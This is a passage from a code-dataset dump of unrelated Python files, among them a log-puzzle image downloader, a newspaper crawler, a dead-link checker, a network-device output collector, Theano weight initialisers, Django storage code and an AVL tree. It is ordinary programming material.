8)'\n )\n","sub_path":"brkt_cli/gcp/wrap_gcp_image_args.py","file_name":"wrap_gcp_image_args.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364366267","text":"#!/usr/bin/python\n# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Google's Python Class\n# http://code.google.com/edu/languages/google-python-class/\n\nimport os\nimport re\nimport sys\nimport urllib.request\nimport copyspecial\n\n\"\"\"Logpuzzle exercise\nGiven an apache logfile, find the puzzle urls and download the images.\n\nHere's what a puzzle url looks like:\n10.254.254.28 - - [06/Aug/2007:00:13:48 -0700] \"GET /~foo/puzzle-bar-aaab.jpg HTTP/1.0\" 302 528 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\"\n\"\"\"\n\n\ndef read_urls(url):\n \"\"\"Returns a list of the puzzle urls from the given log file,\n extracting the hostname from the filename itself.\n Screens out duplicate urls and returns the urls sorted into\n increasing order.\"\"\"\n \n uFile = urllib.request.urlopen(url)\n uFileText = uFile.read()\n imgList = re.findall(r'data-listing-id.*?laptop.*?(https\\S*.jpg)', str(uFileText), re.DOTALL)\n return imgList\n\n \n\ndef download_images(img_urls, dest_dir):\n \"\"\"Given the urls already in the correct order, downloads\n each image into the given directory.\n Gives the images local filenames img0, img1, and so on.\n Creates an index.html in the directory\n with an img tag to show each local image file.\n Creates the directory if necessary.\n \"\"\"\n imgN = 0\n for url in img_urls:\n\n filename = \"img\"+str(imgN)+\".jpg\"\n fullPath = os.path.join(dest_dir, filename)\n urllib.request.urlretrieve(url, fullPath)\n imgN = imgN + 1\n \n file = open('index.html', 'w+')\n file.write('\\n\\n\\n')\n imgList = copyspecial.GetFileLIst(dest_dir)\n imgList.sort()\n for img in imgList:\n imgPath = os.path.join(dest_dir, img)\n file.write('')\n file.write('\\n\\n\\n')\n file.close\n\ndef main():\n args = sys.argv[1:]\n\n if not args:\n print (\"usage: [--todir dir] logfile\")\n sys.exit(1)\n\n todir = args[0]\n if args[0] == '--todir':\n todir = args[1]\n del args[0:2]\n\n img_urls = read_urls(args[0])\n\n if todir:\n if not os.path.isdir(todir):\n os.makedirs(todir)\n download_images(img_urls, todir)\n else:\n print ('\\n'.join(img_urls))\n\nif __name__ == '__main__':\n main()\n","sub_path":"google-python-exercises/logpuzzle/logpuzzle.py","file_name":"logpuzzle.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"560454393","text":"from cc_plugin_ncei.tests.ncei_test_case import NCEITestCase\nfrom cc_plugin_ncei.tests.resources import STATIC_FILES\n\n\nclass TestNCEITimeSeriesProfile(NCEITestCase):\n\n def setUp(self):\n self.run_checker('ncei-timeseries-profile-orthogonal', STATIC_FILES['nodc-timeseries-profile'])\n\n def test_global_profile_score(self):\n assert not self.errors\n\n assert self.results['scored_points'] == 122\n assert self.results['possible_points'] == 126\n known_messages = [\n 'geospatial_lat_resolution should exist and not be empty.',\n 'geospatial_lon_resolution should exist and not be empty.',\n 'sea_name attribute should exist and should be from the NODC sea names list: Cordell Bank National Marine Sanctuary is not a valid sea name',\n 'nodc_template_version attribute must be 
NODC_NetCDF_TimeSeriesProfile_Orthogonal_Template_v1.1'\n ]\n failed_messages = self.get_failed_messages(self.results['all_priorities'])\n assert sorted(failed_messages) == sorted(known_messages)\n\n","sub_path":"cc_plugin_ncei/tests/test_ncei_timeseries_profile.py","file_name":"test_ncei_timeseries_profile.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556520161","text":"# python imports\nimport re\nfrom lxml import html\nfrom urllib.parse import urljoin\n\n# local imports\nfrom crawler.source.utils import geocode, request, extract_xpath\nfrom crawler.source.np.townnews import Source\n\nsources = ['http://www.themonitor.com/', 'http://www.valleymorningstar.com/',\n 'http://www.brownsvilleherald.com/', 'http://www.midvalleytowncrier.com/',\n 'http://www.coastalcurrent.com/', 'http://www.oaoa.com/',\n 'http://www.elextratx.com/', 'http://www.elnuevoheraldo.com/']\n\nproperties = {\n\t\"identifier\": \"//a[contains(@href, 'https://aimiservices.')]|//img[@alt='Aim Media TX LLC']\",\n\t\"parent_name\": \"AIM Media TX\",\n\t\"parent_url\": \"http://www.aimmediatexas.com/portfolio/\",\n\t\"parent_sources_xpath\":\"//tr/td[2]/a/@href\",\n\t\"software_name\":\"BLOX Content Management System\",\n\t\"town_news_server\":\"newyork1\",\n\t\"source_name\": \"//meta[@property='og:site_name']/@content\",\n\t\"address\": \"//div[@class='blox-html-asset']//br/preceding-sibling::text()\",\n\t\"email\": re.compile(r'[\\w. _-]+@[\\w-]+\\.\\w+'),\n\t\"phone\": re.compile(r'\\d{3}-\\d{3}-\\d{4}|\\(\\d{3}\\)\\s*\\d{3}-\\d{4}'),\n\t\"source_type\": \"NP\",\n\t\"has_rss\": True,\n\t\"is_popular\": False,\n\t\"crawl_type\": \"R\",\n\t\"contact_page\": \"/site/contact\",\n\t\"rss_path\": \"/search/?q=&t=article&l=30&d=&d1=&d2=&s=start_time&sd=desc&c[]=news*&f=rss\",\n\t\"rss_xpath\":\"\",\n\t\"articles_path\": \"\",\n\t\"articles_xpath\": \"\",\n\t\"icon_xpath\": \"//*[@rel='apple-touch-icon']/@href\",\n\t\"icon_regex\": re.compile(r\"url\\([\\\"']*([\\w./_-]+)[\\\"']*\\)\\s*no-repeat\"),\n}\n\n\nclass Source(Source):\n\n\tdef __init__(self, url, props=properties, page_tree=None):\n\t\tsuper().__init__(url, props, page_tree)\n\n\t@classmethod\n\tdef build_sources(cls, props=properties, source_urls=None):\n\t\tsource_urls = extract_xpath(props['parent_url'], props[\"parent_sources_xpath\"])\n\t\tif not source_urls:\n\t\t\tsource_urls = sources\n\t\treturn super().build_sources(props, source_urls)\n\n\tdef _get_contact_details(self):\n\t\t\"\"\"\n\t\tAddress can be gotten by visiting the profile page of\n\t\teach source at http://www.aimmediatexas.com/portfolio/slug\n\t\tand crawling the address of that page\n\t\t\"\"\"\n\t\tif not self.name:\n\t\t\traise AttributeError('Can\\'t get address without paper name')\n\n\t\tslug = self._slugify(self.name)\n\t\t# exceptions\n\t\tif 'brownsvilleherald' in self.url:\n\t\t\tslug = 'the_brownsville_herald'\n\n\t\turl = urljoin(self.props['parent_url'], slug)\n\t\tpage = request(url)\n\t\tpage_tree = html.fromstring(page.content)\n\t\textract = extract_xpath(page_tree=page_tree, xpath_value=self.props['address'])\n\n\t\t# strip all white space and return only valid elements\n\t\textract = [item.strip() for item in extract]\n\t\taddress_list = [item for item in extract if item]\n\t\textract_addr = self._reduce_address(address_list[0], address_list[1])\n\n\t\taddress = geocode(extract_addr)\n\n\t\t\"\"\"\n\t\tsearch address list for phone number, if none found\n\t\tparse the 
contact page and look for a phone number\n\t\t\"\"\"\n\t\tfor item in address_list:\n\t\t\tfind_phone = self.props['phone'].search(item)\n\t\t\tif find_phone:\n\t\t\t\tself.phone = find_phone.group()\n\t\t\t\tbreak\n\n\t\t# email has the format news@hostname.com\n\t\temail = self.props['email'].search(page.text)\n\t\tif email:\n\t\t\tself.email = email.group().strip()\n\n\t\treturn address\n","sub_path":"source/np/tx/aim_media.py","file_name":"aim_media.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638979004","text":"import os\nimport glob\nimport re\n\ndef check_for_bad_links(doc_path, links, image_links, data):\n reg = r'\\[.+?\\]\\((\\/.*?)\\)'\n matches = re.findall(reg, data)\n for match in matches: \n if match not in links:\n print(f\"Dead link: {match} found in {doc_path}\")\n\n # Check image links\n reg = r'!\\[\\]\\((\\/.*?)\\)'\n matches = re.findall(reg, data)\n for match in matches:\n if match not in image_links:\n print(f\"Dead image link: {match} found in {doc_path}\")\n\ndef crawl_docs():\n file_paths = []\n links = []\n image_links = []\n\n base_directory = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"docs\")\n for doc_path in glob.glob(base_directory + \"/**/*.md\", recursive=True):\n links.append((\"/\" + os.path.relpath(doc_path, base_directory)).replace(\".md\", \"\").replace(\"\\\\\",\"/\"))\n file_paths.append(doc_path)\n \n base_directory = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"docs\", \"public\")\n for doc_path in glob.glob(base_directory + \"/**/*\", recursive=True):\n image_links.append((\"/\" + os.path.relpath(doc_path, base_directory)).replace(\"\\\\\",\"/\"))\n\n return file_paths, links, image_links\n\ndef main():\n file_paths, links, image_links = crawl_docs()\n\n for doc_path in file_paths:\n with open(doc_path, \"r\", encoding='utf-8') as f:\n check_for_bad_links(os.path.relpath(doc_path, os.getcwd()), links, image_links, f.read())\n\nmain()","sub_path":"scripts/dead_links.py","file_name":"dead_links.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"189747811","text":"\ndef filter_by_keywords(data, keywords):\n \"\"\"\n This function(really ugly) filters results by keywords to provide search functionality\n :param data:\n :param keywords:\n :return: filtered data\n \"\"\"\n keywords = [keyword.lower() for keyword in keywords.split()]\n filtered_data = {}\n for key, value in data.items():\n filtered_games = []\n for index in range(len(value)-1):\n if any(word in value[index].lower() for word in keywords):\n filtered_games.append(value[index])\n\n filtered_data[key] = filtered_games\n\n return filtered_data\n","sub_path":"magetic/parces/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141783288","text":"import sys\n\n\nclass Date:\n def __init__(self, yr, mt, dy):\n self.yr = yr\n self.mt = mt\n self.dy = dy\n\n # format for MDYYYY\n def MDYYYY(self):\n print(f'{self.mt}/{self.dy}/{self.yr}')\n\n # format for MDYY\n def MDYY(self):\n print(f'{self.mt}/{self.dy}/{self.yr}')\n\n # format for YYYYMD\n def YYYYMD(self):\n print(f'{self.yr}/{self.mt}/{self.dy}')\n\n def __str__(self):\n return f'({self.yr}- {self.mt}-{self.dy})'\n\n def __lt__(self, other):\n return (self.yr, self.mt, self.dy) < 
(other.yr, other.mt, other.dy)\n\n def getYear(self):\n return self.__yr\n\n def getMonth(self):\n return self.__mt\n\n def getDay(self):\n return self.__dy\n\n def setYear(self, y):\n try:\n year = int(y)\n if year < 1:\n raise Exception(\"Invalid Year\")\n except Exception as err:\n print(\"Invalid Year\")\n sys.exit(err)\n else:\n self.__yr = year\n\n def setMonth(self, m):\n try:\n month = int(m)\n if month < 1 or month > 12:\n raise Exception(\"Invalid Month\")\n except Exception as err:\n print(\"Invalid Month\")\n sys.exit(err)\n else:\n self.__mt = month\n\n def setDay(self, d):\n try:\n day = int(d)\n if day < 1 or day > 31:\n raise Exception(\"Invalid Day\")\n except Exception as err:\n print(\"Invalid Day\")\n sys.exit(err)\n else:\n self.__dy = day\n\n\nif __name__ == \"__main__\":\n dates = [\n Date(2020, 9, 24),\n Date(2000, 9, 15),\n Date(0, 2, 29),\n Date(1997, 2, 20),\n Date(2001, 5, 2),\n Date(2001, 5, 1),\n Date(1997, 3, 1),\n ]\n\n print(\"dates before sorting : \")\n for d in dates:\n print(d)\n\n sortedDates = sorted(dates, key=lambda x: (x.yr, x.mt, x.dy))\n\n print(\"\\nstudents after sorting : \")\n for d in sortedDates:\n print(d)\n","sub_path":"Homework_7/homework_7_3.py","file_name":"homework_7_3.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"166423905","text":"#!/usr/bin/env python -tt\n\"\"\"\nLibrary for HostManagement Objects\n\"\"\"\n\nimport logging\nimport datetime\nfrom DatabaseManager import DatbaseManager\nfrom utils import write_dict_to_json_file\n\n__author__ = \"Thomas Jongerius\"\n__copyright__ = \"Copyright 2016, Thomas Jongerius\"\n__credits__ = [\"Thomas Jongerius\", \"Alan Holt\"]\n__license__ = \"GPL\"\n__version__ = \"0.1\"\n__maintainer__ = \"Thomas Jongerius\"\n__email__ = \"thomasjongerius@yaworks.nl\"\n__status__ = \"Development\"\n\n\nclass Device(object):\n '''\n Device object containing device settings.\n '''\n\n def __init__(self, name, db_id=None,\n ipv4=None, username=None,\n password=None, port=None,\n prompt=None, timeout=10,\n ssh=None, telnet=None,\n post_commands=[],\n connection_type='SSH'):\n\n self.name = name\n self.db_id = db_id\n self.ipv4 = ipv4\n\n self.connection_settings = {\n \"USERNAME\": username,\n \"PASSWORD\": password,\n \"PROMPT\": prompt,\n \"SSH_COMMAND\": ssh,\n \"TELNET_COMMAND\": telnet,\n \"CONNECTION_PORT\": port,\n \"TIMEOUT\": timeout,\n \"POST_COMMANDS\": post_commands,\n \"CONNECTION_TYPE\": connection_type\n }\n\n def all_node_details(self):\n '''\n Function to return all node details.\n '''\n\n all_node_details = {}\n all_node_details['NAME'] = self.name\n all_node_details['DB_ID'] = self.db_id\n all_node_details['IPV4'] = self.ipv4\n all_node_details['CONNECTION_SETTINGS'] = self.connection_settings\n\n return all_node_details\n\nclass HostManagment(Device):\n '''\n Host Manager to keep data for hosts. 
Export, and import data.\n '''\n\n def __init__(self, prefix=None, postfix='.log', db=DatbaseManager):\n super(Device, self).__init__()\n\n self.hm = {}\n self.prefix = prefix\n self.postfix = postfix\n self.db = db\n\n def add_host(self, host, **kwargs):\n '''\n Function to add host to HostManager and add function as required.\n\n Create Device Object and place them into \"Settings\" of specified host of HostManager.\n\n - ipv4 = IPv4 management address\n - db_id = Database Identifier if applicable\n - prompt = Prompt of device (as of beginning new line)\n - timeout = settings for node\n '''\n self.hm[host] = {}\n\n d = Device(host)\n\n if kwargs:\n if 'ipv4' in kwargs:\n d.ipv4 = kwargs['ipv4']\n if 'db_id' in kwargs:\n d.db_id = kwargs['db_id']\n if 'prompt' in kwargs:\n d.connection_settings['PROMPT'] = kwargs['prompt']\n if 'timeout' in kwargs:\n d.connection_settings['TIMEOUT'] = kwargs['timeout']\n\n self.hm[host]['SETTINGS'] = d\n\n def add_command(self, host, command, output=None):\n '''\n Function to add command to host and timestamp of output retrieval.\n\n Args:\n output (basestring): Output as string\n command (basestring): Command as string\n host (basestring): Hostname or IP as referenced in HostManager\n\n '''\n\n if host not in self.hm:\n self.add_host(host)\n\n if 'COMMANDS' not in self.hm[host]:\n self.hm[host]['COMMANDS'] = {}\n\n self.hm[host]['COMMANDS'][command] = {\n 'OUTPUT': output,\n 'TIMESTAMP': str(datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'))\n }\n\n def write_to_json(self, filename):\n '''\n Output to JSON file as specified\n\n Args:\n filename (basestring): Path to JSON file for output\n '''\n logging.debug(\"Writing JSON output to {}...\".format(filename))\n\n # Remove device object as it is not exportable to JSON\n json_out = {}\n for x in self.hm:\n json_out[x] = {}\n for y in self.hm[x]:\n if y == 'SETTINGS':\n json_out[x]['SETTINGS'] = self.hm[x]['SETTINGS'].all_node_details()\n else:\n json_out[x][y] = self.hm[x][y]\n\n write_dict_to_json_file(filename, json_out, indent=2)\n\n def write_to_txt_files(self, output_dir):\n '''\n Output to text files to path as specified\n\n Args:\n output_dir (basestring): Path to directory for output\n '''\n\n logging.debug(\"Writing files to {}...\".format(output_dir))\n for host in self.hm:\n if 'COMMANDS' in self.hm[host]:\n for command in self.hm[host]['COMMANDS']:\n self.create_file(host=host, command=command,\n output=self.hm[host]['COMMANDS'][command]['OUTPUT'],\n output_dir=output_dir)\n\n def write_to_db(self):\n '''\n Output to DataBase if database object is given.\n '''\n\n if isinstance(self.db, DatbaseManager):\n logging.debug(\"Writing output to database...\")\n\n # Format for supported DataBase Object\n db_output = {}\n\n for host in self.hm:\n db_output[self.hm[host]['SETTINGS'].db_id] = {}\n\n if 'COMMANDS' in self.hm[host]:\n for command in self.hm[host]['COMMANDS']:\n db_output[self.hm[host]['SETTINGS'].db_id][command] = {\n 'OUTPUT': self.hm[host]['COMMANDS'][command]['OUTPUT'],\n 'NAME': host,\n 'TIMESTAMP': self.hm[host]['COMMANDS'][command]['TIMESTAMP']\n }\n\n # Connect and send to database\n self.db.connect()\n self.db.save_command_output(db_output)\n self.db.disconnect()\n else:\n logging.error(\"Database object not loaded into HostManager! Did not save data to DB!\")\n\n def create_file(self, host, output, output_dir, sep='_', command=None, timestamp=None):\n '''\n Function to create files in desired output directory with options. 
This will create a file for\n each host and each command.\n\n Args:\n timestamp (basestring): If given, timestamp will be embedded into filename\n command (basestring): Command-name that will be embedded in filename\n output_dir (basestring): String to path for output\n output (basestring): String for output in file\n host (basestring): Hostname or IP for reference in file\n\n '''\n\n # Setting up path\n s = sep\n filename = output_dir + host\n\n if command:\n command = command.replace(' ', '_')\n filename = filename + s + command\n\n if timestamp:\n filename = filename + s + timestamp\n\n if self.postfix:\n filename = filename + self.postfix\n\n # Write to file\n target = open(filename, 'w')\n target.writelines(output)\n target.close()\n\n logging.debug(\"Write output to: {}\".format(filename))\n","sub_path":"cli_collector/lib/HostManager.py","file_name":"HostManager.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"542355437","text":"import numpy as np\nimport scipy.stats\nimport theano\nimport theano.tensor as T\n\nfrom . import base\n\n\ndef scale_inits(scale, **filter_dsl_kwargs):\n if scale == \"relu\":\n scale = float(np.sqrt(2))\n\n def inner(hs):\n var = hs.kwargs[\"var\"]\n var.set_value(var.get_value() * scale)\n return hs()\n\n return base.filter_dsl(inner,\n key=\"initialize\",\n **filter_dsl_kwargs)\n\n# ############################## general inits ##############################\n\n\ndef constant(value=0.0):\n def constant_inner(var):\n tmp = np.zeros_like(var.get_value(borrow=True))\n tmp += value\n var.set_value(tmp)\n\n return constant_inner\n\n\ndef random_normal(std, mean=0.0):\n def inner(var):\n val = np.random.normal(\n loc=mean,\n scale=std,\n size=base.shape(var),\n ).astype(var.dtype)\n var.set_value(val)\n\n return inner\n\n\ndef random_truncated_normal(std,\n mean=0.0,\n truncation=(-2, 2),\n rescale_std=True):\n def random_truncated_normal_inner(var):\n dist = scipy.stats.truncnorm(*truncation)\n raw = dist.rvs(base.shape(var))\n if rescale_std:\n raw = raw / (raw.std() + 1e-8)\n val = (mean + std * raw).astype(var.dtype)\n var.set_value(val)\n\n return random_truncated_normal_inner\n\n\ndef random_uniform(low, high):\n def inner(var):\n val = np.random.uniform(\n low=low,\n high=high,\n size=base.shape(var),\n ).astype(var.dtype)\n var.set_value(val)\n\n return inner\n\n\n# ############################### weight inits ###############################\n\n\ndef set_weight_init(weight_init, **filter_dsl_kwargs):\n def inner(hs):\n var = hs.kwargs[\"var\"]\n metadata = base.variable_metadata(var)\n hs()\n # perform init afterwards so that later defined hooks\n # actually take effect\n if \"in_axes\" in metadata and \"out_axes\" in metadata:\n weight_init(var)\n\n return base.filter_dsl(inner,\n key=\"initialize\",\n **filter_dsl_kwargs)\n\n\ndef xavier_magnitude(var):\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n in_axes = metadata[\"in_axes\"]\n out_axes = metadata[\"out_axes\"]\n other_axes_size = np.prod([s\n for dim, s in enumerate(shape)\n if not ((dim in in_axes) or\n (dim in out_axes))])\n in_axes_size = np.prod(shape[in_axes])\n out_axes_size = np.prod(shape[out_axes])\n\n return float(np.sqrt(2.0 / ((in_axes_size + out_axes_size) *\n other_axes_size)))\n\n\ndef xavier_normal(var):\n std = xavier_magnitude(var)\n random_normal(std=std)(var)\n\n\ndef xavier_uniform(var):\n magnitude = float(np.sqrt(3)) * xavier_magnitude(var)\n 
random_uniform(low=-magnitude, high=magnitude)(var)\n\n\ndef msr_magnitude(var):\n \"\"\"\n http://arxiv.org/abs/1502.01852\n\n NOTE: also called He init\n \"\"\"\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n out_axes = metadata[\"out_axes\"]\n # consider all non-out_axes as in_axes\n in_axes_size = np.prod([s\n for dim, s in enumerate(shape)\n if dim not in out_axes])\n # NOTE: this is actually sqrt(2) in the paper, but a gain of sqrt(2)\n # is recommended for ReLUs\n return float(np.sqrt(1.0 / in_axes_size))\n\n\ndef msr_normal(var):\n std = msr_magnitude(var)\n random_normal(std=std)(var)\n\n\ndef msr_uniform(var):\n magnitude = float(np.sqrt(3)) * msr_magnitude(var)\n random_uniform(low=-magnitude, high=magnitude)(var)\n\n\ndef orthogonal(var):\n \"\"\"\n http://arxiv.org/abs/1312.6120\n\n implementation from Sander Dieleman\n \"\"\"\n shape = np.array(base.shape(var))\n metadata = base.variable_metadata(var)\n in_axes = metadata[\"in_axes\"]\n out_axes = metadata[\"out_axes\"]\n\n assert len(shape) >= 2\n\n # consider all non-out_axes as in_axes\n tmp_out_shape = []\n tmp_in_shape = []\n in_axes_size = 1\n out_axes_size = 1\n tmp_order = list(out_axes)\n for dim, s in enumerate(shape):\n if dim in out_axes:\n out_axes_size *= s\n tmp_out_shape.append(s)\n else:\n in_axes_size *= s\n tmp_in_shape.append(s)\n tmp_order.append(dim)\n # calculate matrix shape\n flat_shape = (out_axes_size, in_axes_size)\n # make orthogonal matrix\n a = np.random.normal(0.0, 1.0, flat_shape)\n u, _, v = np.linalg.svd(a, full_matrices=False)\n # pick the one with the correct shape\n q = u if u.shape == flat_shape else v\n # reshape to temporary shape\n q = q.reshape(tmp_out_shape + tmp_in_shape)\n # transpose out axes from the beginning\n transpose_axes = [None] * len(shape)\n for idx, dim in enumerate(tmp_order):\n transpose_axes[dim] = idx\n res = np.transpose(q, axes=transpose_axes)\n\n var.set_value(res.astype(var.dtype))\n\n\n# ############################### other inits ###############################\n\n\ndef set_lstm_forget_bias_init(init_value=0.):\n init = constant(init_value)\n\n def set_lstm_forget_bias_init_apply(hs):\n var = hs.kwargs[\"var\"]\n hs()\n init(var)\n\n def set_lstm_forget_bias_inner(hs):\n hs.hooks += [\n base.filter_dsl(set_lstm_forget_bias_init_apply,\n key=\"initialize\",\n variable_scope=[\"lstm\", \"forget\", \"bias\"]),\n base.filter_dsl(set_lstm_forget_bias_init_apply,\n key=\"initialize\",\n variable_scope=[\"lstm\", \"multi_bias\", \"forget\"]),\n ]\n return hs()\n\n return set_lstm_forget_bias_inner\n","sub_path":"thu/inits.py","file_name":"inits.py","file_ext":"py","file_size_in_byte":5934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"603725380","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def EntryNodeOfLoop(self, pHead):\n # write code here\n dummy = ListNode(None)\n dummy.next = pHead\n slow_point = dummy.next\n fast_point = dummy.next\n new_point = dummy.next\n while fast_point.next is not None and fast_point.next.next is not None:\n fast_point = fast_point.next.next\n slow_point = slow_point.next\n if slow_point == fast_point:\n # 存在环\n while new_point != slow_point:\n new_point = new_point.next\n slow_point = slow_point.next\n return new_point\n return 
None","sub_path":"剑指offer/55_链表中环的入口.py","file_name":"55_链表中环的入口.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429539203","text":"import os\nimport django\nos.environ.setdefault('DJANGO_SETTING_MODULE', 'test_Create.settings')\ndjango.setup()\n\nfrom TestModel.models import DisasterInfo,DeathStatistics,InjuredStatistics,MissingStatistics\n\n#下一步存数据库就行了-_-\n\nclass Storage:\n def disasters_storage(self,disastersList):\n for disasterDic in disastersList:\n disaster=DisasterInfo(ID=str(disasterDic['ID']),location=disasterDic['location'],\n date=disasterDic['date'],longitude=float(disasterDic['longitude']),\n latitude=float(disasterDic['latitude']),depth=int(disasterDic['depth']),\n magnitude=float(disasterDic['magnitude']),reportingUnit=disasterDic['reportingUnit'])\n disaster.save()\n disaster.clean()\n\n def death_storage(self, deathDic):\n try:\n death = DeathStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(deathDic['earthquakeId'])),\n location=deathDic['location'],\n date=deathDic['date'],\n number=deathDic['number'],\n reportingUnit=deathDic['reportingUnit'])\n death.save()\n death.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n def injured_storage(self, injuredDic):\n try:\n injured = InjuredStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(injuredDic['earthquakeId'])),\n location=injuredDic['location'],\n date=injuredDic['date'],\n number=injuredDic['number'],\n reportingUnit=injuredDic['reportingUnit'])\n injured.save()\n injured.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n def missing_storage(self, missingDic):\n try:\n missing = MissingStatistics(\n earthquakeId=DisasterInfo.objects.get(ID=str(missingDic['earthquakeId'])),\n location=missingDic['location'],\n date=missingDic['date'],\n number=missingDic['number'],\n reportingUnit=missingDic['reportingUnit'])\n missing.save()\n missing.clean()\n except django.db.utils.IntegrityError:\n print('信息重复,插入失败')\n\n\n\n\n","sub_path":"learn_django/test_Create/TestModel/Store.py","file_name":"Store.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429829041","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype.interfaces import fsl\nfrom nipype.interfaces import afni\n\ndef afni_wf(name='AFNISkullStripWorkflow'):\n \"\"\"\n Skull-stripping workflow\n\n Derived from the codebase of the QAP:\n https://github.com/preprocessed-connectomes-project/\\\nquality-assessment-protocol/blob/master/qap/anatomical_preproc.py#L105\n\n\n \"\"\"\n\n workflow = pe.Workflow(name=name)\n inputnode = pe.Node(niu.IdentityInterface(fields=['in_file']),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(fields=['out_file', 'out_mask']),\n name='outputnode')\n\n sstrip = pe.Node(afni.SkullStrip(outputtype='NIFTI_GZ'), name='skullstrip')\n sstrip_orig_vol = pe.Node(afni.Calc(\n expr='a*step(b)', outputtype='NIFTI_GZ'), name='sstrip_orig_vol')\n binarize = pe.Node(fsl.Threshold(args='-bin', thresh=1.e-3), name='binarize')\n\n workflow.connect([\n (inputnode, sstrip, [('in_file', 'in_file')]),\n (inputnode, sstrip_orig_vol, [('in_file', 'in_file_a')]),\n (sstrip, sstrip_orig_vol, [('out_file', 'in_file_b')]),\n 
(sstrip_orig_vol, binarize, [('out_file', 'in_file')]),\n (sstrip_orig_vol, outputnode, [('out_file', 'out_file')]),\n (binarize, outputnode, [('out_file', 'out_mask')])\n ])\n return workflow\n","sub_path":"niworkflows/anat/skullstrip.py","file_name":"skullstrip.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"300883438","text":"from f.tree_node import TreeNode\n\n\nclass AVLSearchTree:\n\n def __init__(self) -> None:\n self.root = None\n self.size = 0\n\n def __len__(self) -> int:\n return self.length()\n\n def __iter__(self):\n return self.root.__iter__()\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __setitem__(self, key, value) -> None:\n self.put(key, value)\n\n def __delitem__(self, key) -> None:\n self.delete(key)\n\n def __contains__(self, key) -> bool:\n return True if self._get(key, self.root) else False\n\n def getTreeValues(self):\n result, items, queue = [], [], []\n if self.root is None:\n return result\n queue.append(self.root)\n while queue:\n current = queue.pop(0)\n items.append(current)\n if current.left is not None:\n queue.append(current.left)\n if current.right is not None:\n queue.append(current.right)\n [result.append(item.value) for item in items]\n return result\n\n def length(self) -> int:\n return self.size\n\n def get(self, key):\n if self.root:\n node = self._get(key, self.root)\n return node.value if node else None\n else:\n return None\n\n def _get(self, key, node: TreeNode):\n if not node:\n return None\n elif key == node.key:\n return node\n elif key < node.key:\n return self._get(key, node.left)\n else:\n return self._get(key, node.right)\n\n def put(self, key, value):\n if self.root:\n self._put(key, value, self.root)\n else:\n self.root = TreeNode(key, value)\n self.size += 1\n\n def _put(self, key, value, node: TreeNode):\n if key < node.key:\n if node.hasLeftChild():\n self._put(key, value, node.left)\n else:\n node.left = TreeNode(key, value, parent=node)\n self._balance(node.left)\n else:\n if node.hasRightChild():\n self._put(key, value, node.right)\n else:\n node.right = TreeNode(key, value, parent=node)\n self._balance(node.right)\n\n def _balance(self, node: TreeNode):\n if node.balanceFactor > 1 or node.balanceFactor < -1:\n self._rebalance(node)\n return\n if node.parent is not None:\n if node.isLeftChild():\n node.parent.balanceFactor += 1\n elif node.isRightChild():\n node.parent.balanceFactor -= 1\n\n if node.parent.balanceFactor != 0:\n self._balance(node.parent)\n\n def _rebalance(self, node: TreeNode) -> None:\n if node.balanceFactor < 0:\n if node.right.balanceFactor > 0:\n self.rotateRight(node.right)\n self.rotateLeft(node)\n else:\n self.rotateLeft(node)\n elif node.balanceFactor > 0:\n if node.left.balanceFactor < 0:\n self.rotateLeft(node.left)\n self.rotateRight(node)\n else:\n self.rotateRight(node)\n\n def delete(self, key) -> None:\n if self.size > 1:\n nodeToRemove = self._get(key, self.root)\n if nodeToRemove:\n self._delete(nodeToRemove)\n self.size -= 1\n elif self.size == 1 and key == self.root.key:\n self.root = None\n self.size -= 1\n else:\n raise KeyError('Key is not in tree')\n\n def _delete(self, node: TreeNode) -> None:\n if node.isLeaf():\n if node == node.parent.left:\n node.parent.left = None\n else:\n node.parent.right = None\n elif node.hasBothChildren():\n sub = node.findSubNode()\n sub.spliceOut()\n node.key = 